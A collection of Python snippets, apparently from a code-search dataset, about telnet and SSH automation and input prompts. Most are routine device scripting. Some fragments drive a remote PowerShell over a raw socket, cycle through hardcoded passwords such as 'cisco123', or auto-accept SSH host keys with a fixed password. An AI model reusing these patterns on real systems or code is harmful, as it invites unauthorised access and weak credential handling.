console.sendline('')\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT])\n while i >= 0:\n if i == 0:\n console.close()\n logging.info('telnet_console_port, Timed out, Not able to access console')\n raise TimeoutError('telnet_console_port, Timed out, Not able to access console')\n if i == 1:\n console.close()\n logging.info('telnet_console_port, Eof error, Not able to access console')\n raise EofError('telnet_console_port, Eof error, Not able to access console')\n if i == 2:\n console.close()\n logging.info('telnet_console_port, Password error')\n raise PasswordError('telnet_console_port, Password error')\n if i>2 and i<8:\n console.close()\n logging.info(\"telnet_console_port, switch is booting so load and check\")\n raise BootingError(\"telnet_console_port, switch is booting so load and check\")\n if i == 8 or i == 9:\n console.close()\n logging.info('telnet_console_port, Switch in loader/boot prompt')\n raise LoaderError('telnet_console_port, Switch in loader/boot prompt')\n if i == 10 or i == 11:\n console.sendline('exit')\n if i == 12:\n console.sendline('admin')\n if i == 13:\n console.sendline(self.switch_pwd)\n if i == 14:\n break\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT], 5)\n \n return console", "def client_connected(self, telnet_connection):", "def handle_telnet_cmd(self, telnet_cmd):\n print(\"Telnet cmd: {}\".format(telnet_cmd))\n # termious hack\n if self.termious is None:\n if len(telnet_cmd) == 8:\n if telnet_cmd[0] == 250 and telnet_cmd[1] == 31:\n self.termious = True\n if len(telnet_cmd) == 2:\n if telnet_cmd[0] == 251 and telnet_cmd[1] == 31:\n self.termious = False", "def put_prompt(self, session):\n self.reply_text(session, self._prompt, False)", "def send_telnet_command(command):\n\n tn = telnetlib.Telnet(stb_parameters.STB_IP)\n tn.read_until(bytes(\"login: \", 'UTF-8'))\n tn.write(bytes(stb_parameters.STB_USER_NAME + \"\\n\", 'UTF-8'))\n tn.write(bytes(command + \"\\n\", 'UTF-8'))\n tn.write(bytes(\"exit\\n\", 'UTF-8'))\n result = tn.read_all().decode('ascii')\n return result", "def waitprompt(c):\n c.expect('\\n> ')\n time.sleep(0.1)", "async def send_commandTelnet(self, cmd, pattern=None, timeout=None):\n\n # Debug info message\n log.info(\"send_commandTelnet\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + \"\\n\"\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n try:\n\n # Read data\n while True:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(f\"send_commandTelnet: byte_data: '{byte_data}'\")\n\n # Temporary convertion in string. 
This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"send_commandTelnet: output: '{output}'\")\n\n # Is a patten used?\n if pattern:\n\n # Use pattern instead of prompt\n if pattern in output:\n\n # Yes\n\n # Leave the loop\n break\n\n else:\n\n # Check if prompt is found\n if self.check_if_prompt_is_found(output):\n\n # Yes\n\n # Leave the loop\n break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Display error message\n log.error(\"send_commandTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Display error message\n log.error(f\"send_commandTelnet: error: {error}\")\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: raw output: '{output}'\\nsend_commandTelnet: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: cleaned output: '{output}'\\nsend_commandTelnet: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Check if there is an error in the output string (like \"% Unrecognized command\")\n # and generate an exception if needed\n self.check_error_output(output)\n\n # Return the result of the command\n return output", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def telnet_login(\n self, username_pattern=r\"(?:user>)\", alt_prompt_term=r\"#\\s*$\", **kwargs\n ):\n self.TELNET_RETURN = self.RETURN\n return super().telnet_login(\n username_pattern=username_pattern,\n alt_prompt_terminator=alt_prompt_term,\n **kwargs\n )", "def _postConnect(self):\n p = self.spawnProc\n msg = \"SessionManager._postConnect: failed to get prompt\"\n expList.append(self.prompt)\n match = p.expect(expList, self.sshTimeout)\n self._postCheck(match,msg,True)", "def test_direct_access_telnet_mode(self):\n self.assert_enter_command_mode()\n\n # go into direct access\n self.assert_direct_access_start_telnet(timeout=600)\n self.tcp_client.send_data(\"#D\\r\\n\")\n if not self.tcp_client.expect(\"\\r\\n\"):\n self.fail(\"test_direct_access_telnet_mode: did not get expected response\")\n \n self.assert_direct_access_stop_telnet()", "def ask(self, prompt: str) -> str:\n raise NotImplementedError", "def prompt() -> None:\n\n username = click.prompt(\n text=\"Please enter a username\",\n type=click.STRING\n )\n password = click.prompt(\n text=\"Please enter a new password\",\n hide_input=True,\n confirmation_prompt=True\n )\n newsletter_subscription = click.prompt(\n text=\"Would you like to subscribe to our newsletter?\",\n default=False,\n type=click.BOOL\n )\n favorite_color=click.prompt(\n text=\"What is your favorite color?\",\n type=click.Choice([\"blue\", \"green\", \"yellow\"], case_sensitive=False)\n )\n\n click.echo(\n f\"Username: {username} | Password: {'*' * len(password)} | \"\n + f\"Newsletter: {newsletter_subscription} | Favorite color: \"\n + 
click.style(favorite_color, fg=favorite_color)\n )", "def showPrompt(self):\r\n self.terminal.nextLine()\r\n self.terminal.write(self.ps[self.pn])", "def passPrompt(title, prompt):\n answer = tkSimpleDialog.askstring(title, prompt, show=\"*\")\n print answer", "def connect(host: str, port: int):\n print('Connecting to the server...')\n print(cmd.RESP_OK, type(cmd.RESP_OK))\n tn = telnetlib.Telnet(host = host, port = port)\n code, params = cmd.serv_read_resp(tn)\n if code != cmd.RESP_OK:\n print(f'Connection problem. {code, params}')\n exit(0)\n print(f'{params[0]}\\n')\n return tn", "async def interactive_shell():\n # Create Prompt.\n session = PromptSession('Say something: ')\n\n # Run echo loop. Read text from stdin, and reply it back.\n while True:\n try:\n result = await session.prompt(async_=True)\n print('You said: \"{0}\"'.format(result))\n except (EOFError, KeyboardInterrupt):\n return", "def __alt_prompt(self, prompt_text: str):\r\n if self.__use_windows_prompt:\r\n sys.stdout.write(prompt_text)\r\n sys.stdout.flush()\r\n i = sys.stdin.readline()\r\n return i.strip()\r\n return input(prompt_text)", "def login (self,server,username,password='',terminal_type='ansi',original_prompts=r\"][#$]|~[#$]|bash.*?[#$]|[#$] \",login_timeout=10):\r\n cmd = \"ssh -l %s %s\" % (username, server)\r\n spawn.__init__(self, cmd, timeout=login_timeout)\r\n #, \"(?i)no route to host\"])\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT, \"(?i)connection closed by remote host\"])\r\n if i==0: # New certificate -- always accept it. This is what you if SSH does not have the remote host's public key stored in the cache.\r\n self.sendline(\"yes\")\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n if i==2: # password\r\n self.sendline(password)\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n if i==4:\r\n self.sendline(terminal_type)\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n\r\n if i==0:\r\n # This is weird. This should not happen twice in a row.\r\n self.close()\r\n return False\r\n elif i==1: # can occur if you have a public key pair set to authenticate. \r\n ### TODO: May NOT be OK if expect() matched a false prompt.\r\n pass\r\n elif i==2: # password prompt again\r\n # For incorrect passwords, some ssh servers will\r\n # ask for the password again, others return 'denied' right away.\r\n # If we get the password prompt again then this means\r\n # we didn't get the password right the first time. \r\n self.close()\r\n return False\r\n elif i==3: # permission denied -- password was bad.\r\n self.close()\r\n return False\r\n elif i==4: # terminal type again? WTF?\r\n self.close()\r\n return False\r\n elif i==5: # Timeout\r\n # This is tricky... 
presume that we are at the command-line prompt.\r\n # It may be that the prompt was so weird that we couldn't match it.\r\n pass\r\n elif i==6: # Connection closed by remote host\r\n self.close()\r\n return False\r\n else: # Unexpected \r\n self.close()\r\n return False\r\n # We appear to be in -- reset prompt to something more unique.\r\n if not self.set_unique_prompt():\r\n self.close()\r\n return False\r\n return True", "def enter_repl(self):\n text_input = ''\n while True:\n text_input = input('>>')\n if text_input == 'exit':\n break\n #An alias for querying an instrument error string\n elif text_input == 'err?':\n self.write_to_serial(':SYST:ERR?')\n print(self.read_from_serial())\n else:\n self.write_to_serial(text_input)\n print(self.read_from_serial())", "def send_recv_session(self, fillin):\n prompts = self.session_params[\"prompts\"]\n timeout = self.session_params[\"timeout\"]\n add_eol = self.session_params[\"add_eol\"]\n func = self.session_params[\"out_func\"]\n\n if fillin is not None:\n self.session.send(fillin.encode(\"utf-8\"))\n if add_eol and not fillin.endswith('\\n'):\n self.session.send(\"\\n\".encode(\"utf-8\"))\n\n buff = ''\n begin = time.perf_counter()\n while True:\n try:\n resp = self.session.recv(9999)\n except socket.timeout:\n resp = b\"\"\n dec = resp.decode(\"unicode_escape\")\n buff += dec\n for p in prompts:\n if buff.endswith(p):\n break\n if time.perf_counter() - begin > timeout:\n break\n\n return func(buff.replace(\"\\r\", \"\"))", "def do_prompt(self, line):\n self.prompt = line + ': '", "def login(self, asRoot=True):\n self.pc = Telnet(self.ipaddr)\n self.pc.expect(['login'])\n self.pc.write(self.user+'\\n')\n self.pc.expect(['Password'])\n self.pc.write(self.passwd+'\\n')\n ix, ox, tx = self.pc.expect(self.prompt, self.timeout)\n if ix == -1:\n raise Exception('Can not telnet to \\'%s\\'' %self.ipaddr)", "def do_prompt(self, line):\n if line:\n self.prompt = \"(%s) \" %line\n\n else:\n print 'Please specify a prompt text'", "def consolePrompt(prompt:str, nl:bool = True, default:str = None) -> str:\n\t\tanswer = None\n\t\ttry:\n\t\t\tanswer = Prompt.ask(f'[{Logging.terminalStyle}]{prompt}', console = Logging._console, default = default)\n\t\t\tif nl:\n\t\t\t\tLogging.console()\n\t\texcept KeyboardInterrupt as e:\n\t\t\tpass\n\t\texcept Exception:\n\t\t\tpass\n\t\treturn answer", "def interact(self):\n print('Ready to interact on socket connected with {}.'.format(self.remote_addr))\n try:\n # get initial input from user\n print('Enter input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n while True:\n if data.startswith('exit'):\n print('[*] Closing remote shell.')\n self.close()\n break\n # wait for response from target host\n recv_len = 1\n response = ''\n while recv_len:\n data = self.remote_socket.recv(4096)\n recv_len = len(data)\n response += data.decode()\n if recv_len < 4096:\n break\n print(response)\n # get further input from user\n print('Enter further input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n except Exception as e:\n print(e)\n print('[*] Closing remote shell.')\n self.close()", "def _on_connect(self, stream_reader, stream_writer):\n # Sometimes the remote side doesn't send the newline for the first\n # prompt. This causes our prompt matching to fail. Here we inject a\n # newline to normalize these cases. 
This keeps our prompt processing\n # simple.\n super().data_received(b\"\\n\")\n self._session._session_connected(stream_reader, stream_writer)", "def prompt (self, timeout=20):\r\n i = self.expect([self.PROMPT, TIMEOUT], timeout=timeout)\r\n if i==1:\r\n return False\r\n return True", "async def connectTelnet(self):\n\n # Display info message\n log.info(\"connectTelnet\")\n\n try:\n\n # Prepare connection with Telnet\n conn = asyncio.open_connection(self.ip, self.port)\n\n except Exception as error:\n\n # Preparation to the connection failed\n\n # Display error message\n log.error(f\"connectTelnet: preparation to the connection failed: '{error}'\")\n\n # Exception propagation\n raise\n\n # Display info message\n log.info(\"connectTelnet: preparation to the connection success\")\n\n try:\n\n # Connection with Telnet\n self._reader, self._writer = await asyncio.wait_for(\n conn, timeout=self.timeout\n )\n\n except asyncio.TimeoutError:\n\n # Time out during connection\n\n # Display error message\n log.error(\"connectTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n # Display info message\n log.info(\"connectTelnet: connection success\")\n\n # Get prompt for the login\n prompt = self._telnet_connect_login\n\n # Get prompt for the password\n prompt_password = self._telnet_connect_password\n\n # By default a login is expected\n use_login = True\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n # Read the telnet information and first prompt (for login but a password prompt can be found for IOS for instance)\n while True:\n\n # Display info message\n log.info(f\"connectTelnet: read data for prompt\")\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=self.timeout\n )\n\n # Display info message\n log.info(f\"connectTelnet: byte_data: {byte_data}\")\n\n # Temporary convertion in string. 
This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"connectTelnet: output: {output}\")\n\n # Prompt for the username found?\n if prompt in output:\n\n # Yes\n\n # Leave the loop\n break\n\n # Prompt for the password found?\n elif prompt_password in output:\n\n # Yes\n\n # That means only password is required\n use_login = False\n\n # Leave the loop\n break\n\n # Display info message\n log.info(f\"connectTelnet: login prompt: '{output}'\")\n\n # Login to use?\n if use_login:\n\n # Yes\n\n # Display info message\n log.info(\"connectTelnet: sending login\")\n\n try:\n\n # Send login\n await self.send_command(self.username, prompt_password)\n\n # Display info message\n log.info(\"connectTelnet: login sent\")\n\n except Exception:\n\n # Problem with the login\n\n # Propagate the exception\n raise\n\n # Display info message\n log.info(\"connectTelnet: sending password\")\n\n try:\n # Send password\n output = await self.telnet_send_command_with_unexpected_pattern(\n self.password,\n self._connect_first_ending_prompt,\n self._telnet_connect_authentication_fail_prompt,\n )\n\n except Exception:\n\n # Problem with the password\n\n # Propagate the exception\n raise\n\n # Display info message\n log.info(\"connectTelnet: password sent\")\n\n # Find prompt\n self.prompt = self.find_prompt(str(output))\n\n # Display info message\n log.info(f\"connectTelnet: prompt found: '{self.prompt}'\")\n\n # Password enable?\n if self.enable_mode:\n\n # Yes\n\n # Display info message\n log.info(\"connectTelnet: enable mode to be activated\")\n\n try:\n\n # Send enable command\n await self.send_command(self.cmd_enable, prompt_password)\n\n # Display info message\n log.info(\"connectTelnet: enable command sent\")\n\n # Display info message\n log.info(\"connectTelnet: sending enable password\")\n\n # Send enable password\n await self.telnet_send_command_with_unexpected_pattern(\n self.enable_password,\n self._connect_first_ending_prompt,\n self._telnet_connect_authentication_fail_prompt,\n )\n\n # Display info message\n log.info(\"connectTelnet: enable password sent\")\n\n except Exception:\n\n # Problem with the enable password\n\n # Display info message\n log.info(\"connectTelnet: enable password failure\")\n\n # Propagate the exception\n raise\n\n # Disable paging command available?\n if self.cmd_disable_paging:\n\n # Yes\n\n # Disable paging\n await self.disable_paging()", "async def interactive_shell(self) -> None:\n session = PromptSession()\n while True:\n try:\n result = await session.prompt_async(f\"redCisco> \", style=style)\n if not result:\n continue\n await self.command_interpreter(str(result).strip())\n except (EOFError, KeyboardInterrupt):\n break", "def query(self, *parameters):\n telnet = telnetlib.Telnet(self.host, self.port)\n if self._username and self._password:\n telnet.write('login {username} {password}\\n'.format(\n username=self._username,\n password=self._password).encode('UTF-8'))\n telnet.read_until(b'\\n', timeout=3)\n message = '{}\\n'.format(' '.join(parameters))\n telnet.write(message.encode('UTF-8'))\n response = telnet.read_until(b'\\n', timeout=3)\\\n .decode('UTF-8')\\\n .split(' ')[-1]\\\n .strip()\n telnet.write(b'exit\\n')\n return urllib.parse.unquote(response)", "def login_aashell(self):\n flag = 0\n login_aashell = 'telnet 192.168.255.1 15007'\n aashell_prompt = 'AaShell>'\n\n self._current.write(login_aashell)\n self._current.read_until_regexp(aashell_prompt)\n flag = 1\n\n return flag", "def input(self, 
prompt):\r\n return console_input(prompt)", "def prompt(promptstring='>'):\n class PromptWithString(Prompt):\n def __init__(self, document, callback=None):\n Prompt.__init__(self, document, callback)\n self.promptstring = promptstring\n return PromptWithString", "def _postConnect(self):\n\n #timeout = 5\n p = self.spawnProc\n list = [self.prompt,\"ssh:\", \"[Pp]assword: \", \"\\? \", \n\n\t \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\", \n pexpect.EOF,pexpect.TIMEOUT]\n \n match = p.expect(list,self.sshTimeout )\n #prompt\n if (match == list.index(self.prompt)) : \n # got a prompt, want to save the prompt chunk so we can use\n # it later to trim command output. do this by sending a\n # \\r and cultivating the bare prompt.\n p.sendline(\"\")\n p.expect(self.prompt)\n self._extractPChunk(p.before)\n\t # ssh error message\n elif (match == list.index(\"ssh:\")): \n # TODO: send the ssh error text in the exception\n msg = \"Error occured while executing ssh command \"\n raise SessionManagerException,msg\n\t # passwd prompt\n elif match == 2: \n \n\t msg = \"ssh command got 'Password:' prompt,\"\n p.sendline(\"shipped!!\")\n\t try:\n p.expect(self.prompt,self.sshTimeout)\n self._extractPChunk(p.before)\n\t except pexpect.TIMEOUT:\n print msg\n raise SessionManagerException,msg\n # connect confirmation prompt\n elif match == 3: \n p.sendline(\"yes\")\n p.expect(list[2])\n p.sendline(\"shipped!!\")\n\t try:\n p.expect(self.prompt,self.sshTimeout)\n self._extractPChunk(p.before)\n\t except pexpect.TIMEOUT:\n msg = \"ssh login confirmation problem\"\n msg = msg + \" Key exchange not successful \"\n\t\tprint msg\n raise SessionManagerException,msg\n\n self._extractPChunk(p.before)\n\t\n # Remote host identification change \n elif match == 4: \n msg = \"Remote host identification change: check ~/.ssh/known_hosts file\"\n raise SessionManagerException, msg\n # Unexpected Prompt while trying to connect \n elif match == 5: \n msg = \"ssh got unexpected prompt, did not establish connection\"\n raise SessionManagerException, msg\n \n # Timeout Error \n elif (match == list.index(pexpect.TIMEOUT)):\n msg = 'ssh to %s timed out' % self.args\n raise SessionManagerException, msg", "def recv_to_prompt(self):\n buf = \"\"\n while True:\n ibuf = self._channel.recv(65536)\n buf += ibuf\n if ibuf.endswith(\"$ \") or ibuf.endswith(\"# \"):\n break\n\n lbuf = buf.splitlines()\n return lbuf[1:-1]", "def __clear_telnet_port(self, console_ip, port):\n logging.info(\"Clearing console with ip=%s and ports=%s\", console_ip, port)\n pwdList = ['cisco123', 'lab', 'nbv123']\n pwdList.remove(self.console_pwd)\n pwdTry = 0\n console = pexpect.spawn('telnet %s'%(console_ip))\n console.logfile = self.log\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, r'Bad', r'(?i)incorrect', PWD_PROMPT, CONSOLE_PROMPT, EN_CONSOLE_PROMPT], 5)\n while i >= 0:\n if i == 0:\n console.close()\n raise TimeoutError('Clear Console Timeout error')\n if i == 1:\n console.close()\n raise EofError('Clear Console EOF error')\n if i == 2 or i == 3:\n console.close()\n raise PasswordError('Clear Console, Password error')\n if i == 4:\n logging.info(\"pwd %s\", self.console_pwd)\n if pwdTry == 0:\n console.sendline(self.console_pwd)\n elif pwdTry > 0 and pwdTry <= len(pwdList):\n console.sendline(pwdList[pwdTry - 1])\n self.console_pwd = pwdList[pwdTry-1]\n else:\n console.close()\n raise PasswordError('Clear Console, Password error')\n pwdTry = pwdTry + 1\n if i == 5:\n logging.info(\"console prompt\")\n 
Utils.update_console_login_details(self.switch_name, self.console_user, self.console_pwd)\n console.sendline('en')\n console.expect(PWD_PROMPT)\n console.sendline(self.console_pwd)\n if i == 6:\n logging.info(\"en console prompt\")\n Utils.update_console_login_details(self.switch_name, self.console_user, self.console_pwd)\n break \n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, r'Bad', r'(?i)incorrect', PWD_PROMPT, CONSOLE_PROMPT, EN_CONSOLE_PROMPT], 5)\n \n po = int(port)%100\n console.sendline('clear line %d'%(po))\n console.sendline('\\r')\n console.expect('confirm')\n console.sendline('\\r')\n console.expect(EN_CONSOLE_PROMPT)\n console.sendline('exit')\n time.sleep(1)\n console.close()\n return", "def prompt_base(prompt):\n return input(prompt + \": \")", "def run_cmd(server, client):\n msg = [client.get_command()]\n client.input_list += msg\n server.logger.info(\"RECEIVED INPUT {} : {}\".format(client.ip, msg[0]))\n if not client.username or not client.password:\n server.login_screen(client, msg)\n return\n loop_cmds(server, client, msg[0].split(';'))\n server.return_prompt(client)", "def SendCmd(self, command):\r\n if not self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager() \r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(self.prompt, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def prompt(self, task, text='', print_=False):\n template = self.prompts[task]['prompt']\n res = self.format_prompt(task, template, text)\n if print_:\n print(res)\n else:\n return res", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def on_start(self, session):\n self.put_prompt(session)", "def prompt_ip(prompt):\n response = \"\"\n while not is_valid_ip(response):\n response = prompt_base(prompt)\n return response", "def run(self, cmd, exp='', timeout=60):\n if not self.connected(): return (False, list())\n\n clist = cmd.split()\n\n # disable paing and echo would simplify parsing\n self.set_paging_status(False)\n self.set_echo_status(False)\n\n # do not allow paging and echo and prompt command\n if clist[0] == 'paging' or clist[0] == 'echo' or clist[0] == 'prompt':\n return (True, list())\n\n\n if not exp:\n # prompt will be inserted by middle commands, so replace with '.*'\n exp = [(self.prompt[:-2] + '.*# ').encode('ascii')]\n\n if not isinstance(exp, list):\n exp = [exp]\n\n # capture this if paging status is enabled by user command unexpectedly\n exp.append(br'more\\? 
y=\\[yes\\] q=\\[quit\\].*')\n\n try:\n self.write(cmd + '\\n')\n res = list()\n while True:\n resp = self.tn.expect(exp, timeout)\n if resp[0] == -1:\n sys.stderr.write(self.ne + \": \" + cmd + \" no resp\\n\")\n return (False, list())\n elif resp[0] == (len(exp) - 1): # paging\n # remove the the tailline(which is paging indication) \n res += resp[2].decode('ascii').splitlines()[:-1]\n self.write(b'y')\n else:\n res += resp[2].decode('ascii').splitlines()\n break\n except:\n sys.stderr.write(self.ne + \": \" + cmd + \" FAIL\\n\")\n self.close()\n return (False, list())\n\n # remove tailline(which is prompt)\n return (True, list(filter(None, res[:-1])))", "def prompt(question):\n print('\\n')\n while True:\n reply = str(input(question+' (y/n): ')).lower().strip()\n if reply[:1] == 'y':\n return True\n if reply[:1] == 'n':\n return False", "def prompt(msg):\n # remove non-blocking mode\n fd = sys.stdin.fileno()\n flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)\n flags = flags & ~os.O_NONBLOCK\n fcntl.fcntl(fd, fcntl.F_SETFL, flags)\n return raw_input(msg)", "def ask_password(self, prompt: str) -> str:\n raise NotImplementedError", "def get_user_input(self):\n while not self.suspended:\n input = raw_input()\n input = input.split('|')\n if input[0] in ['exit', 'quit', 'kill']:\n self.broadcast('kill')\n self.suspended = True\n for client in self.clients.values():\n client.socket.close()\n self.s.close() # Have to connect to socket to exit server.\n sock = socket(AF_INET, SOCK_STREAM)\n port = bind_to_random(sock)\n sock.connect((str(self.ip), self.port))\n elif len(input) > 1:\n msg = '|'.join(['#server']+input[1:])\n if input[0][:1] == '@':\n destination = input[0][1:].lower()\n if destination == 'server':\n print msg\n elif destination == 'all':\n self.broadcast(msg)\n else:\n client = self.clients.get(destination, None)\n if client:\n client_send(client.socket, msg)\n else:\n print 'Destination not active'\n else:\n print msg", "def prompt(self, question):\n self.output(' ')\n self.output(question)\n self.output(self.parse_response(str(self.ui())))", "def speech_response_prompt(output, reprompt_text, endsession):\n\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': endsession\n }", "def speech_response_prompt(output, reprompt_text, endsession):\n\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': endsession\n }", "def test_strip_prompt():\n string = \"\"\"MyRouter version 1.25.9\nmyhostname>\"\"\"\n connection = FakeBaseConnection(RESPONSE_RETURN=\"\\n\", base_prompt=\"myhostname>\")\n result = connection.strip_prompt(string)\n assert result == \"MyRouter version 1.25.9\"", "def __init__(self, hostname, login_password, admin_password, port=23):\n # Connect first.\n connection.TelnetConnection.__init__(self, hostname, port)\n handle = self.get_handle()\n\n # Then authenticate.\n try:\n handle.read_until(\"Password: \", _LOGIN_TIMEOUT)\n handle.write(login_password + \"\\n\")\n\n handle.read_until(\">\", _LOGIN_TIMEOUT)\n handle.write(\"enable\\n\")\n\n handle.read_until(\"Password: \", _LOGIN_TIMEOUT)\n handle.write(admin_password + \"\\n\")\n\n handle.read_until(\"#\", _LOGIN_TIMEOUT)\n handle.write(\"terminal length 0\\n\")\n handle.read_until(\"#\", _LOGIN_TIMEOUT)\n\n except Exception, err:\n raise 
connection.AuthenticationFailed(err)", "def textinput(self, title, prompt):\n return simpledialog.askstring(title, prompt)", "def prompt(self):\n return input(self.message + \": \").strip()", "def ask(prompt):\n\n return renpy.exports.invoke_in_new_context(renpy.store.layout.yesno_prompt, None, prompt)", "def input_timeout(prompt: str, t_timeout: [float, int] = 30, default: str = None) -> str:\n print(prompt, end=\" \")\n rlist, _, _ = select.select([sys.stdin], [], [], t_timeout)\n\n if not rlist:\n if default is None:\n raise RuntimeError(f\"No input received within {t_timeout}s!\")\n else:\n return default\n\n return sys.stdin.readline().strip()", "def connect_new_ssh(child, password):\n child.sendline('yes');\n index = child.expect('password: ');\n if index == 0:\n child.sendline(password);", "def auto_connect(address):\r\n _connected=False\r\n _timeout=100\r\n _count = 0\r\n\r\n while not _connected:\r\n try:\r\n _c = telnetlib.Telnet(address)\r\n if _c.sock is not None:\r\n _connected = True\r\n\r\n except socket.error:\r\n _count = _count + 1\r\n print \"Trima socket not ready, waiting to retry, attempt #\"+str(_count)\r\n time.sleep(5)\r\n\r\n print(\"Trima Telnet Connection Ready\")", "def _prompt(letters='yn', default=None):\n while True:\n try:\n input_text = sys.stdin.readline().strip()\n except KeyboardInterrupt:\n sys.exit(0)\n if input_text and input_text in letters:\n return input_text\n if default is not None and input_text == '':\n return default\n print('Come again?')", "def shell(s_socket):\r\n shellname = \"powershell\"\r\n bytes_value = to_bytes(len(shellname), 4, 'little')\r\n s_socket.send('o' + bytes_value + shellname)\r\n value = raw_input(shellname + \"#> \")\r\n while True:\r\n bytes_value = to_bytes(len(value), 4, 'little')\r\n s_socket.send('s' + bytes_value + value)\r\n print(s_socket.recv(20000))\r\n\r\n if 'exit' in value:\r\n break\r\n\r\n value = raw_input(shellname + \"#> \")", "def prompt(self):\n self.prompt_flag = True", "def prompt_for_mail_client():\n answ = raw_input(\"\\nOpen default client with above message? 
(y/n) \").lower()\n if not answ or answ not in [\"y\",\"n\"]:\n print \"Please answer 'y' or 'n'.\"\n return prompt_for_mail_client()\n elif answ == \"y\":\n return True\n else:\n return False", "def input_with_timeout(prompt: Optional[str] = None, timeout: float = 36000.0) -> str:\n # use of sys.stdin and sys.stdout to mimic the builtin input based on\n # https://github.com/python/cpython/blob/baf7bb30a02aabde260143136bdf5b3738a1d409/Lib/getpass.py#L129\n if prompt:\n sys.stdout.write(prompt)\n sys.stdout.flush()\n\n line = misc.readline_with_timeout(timeout, prompt)\n\n if not line:\n raise EOFError\n return line.rstrip('\\n')", "def _ask_prompt(question: str,\n console: io.IO,\n validate: Optional[Callable[[str], None]] = None,\n default: Optional[str] = None) -> str:\n validate = validate or (lambda x: None)\n while True:\n answer = console.ask(question)\n if default and not answer:\n answer = default\n try:\n validate(answer)\n break\n except ValueError as e:\n console.error(e)\n\n return answer", "def prompt():\n sys.stdout.write('>> ')\n sys.stdout.flush()", "def take_pass(text_to_prompt):\r\n return prompt(text_to_prompt, is_password=True)", "def ask_input(self, prompt):\n self._vim.command('call inputsave()')\n self._vim.command('let user_input = 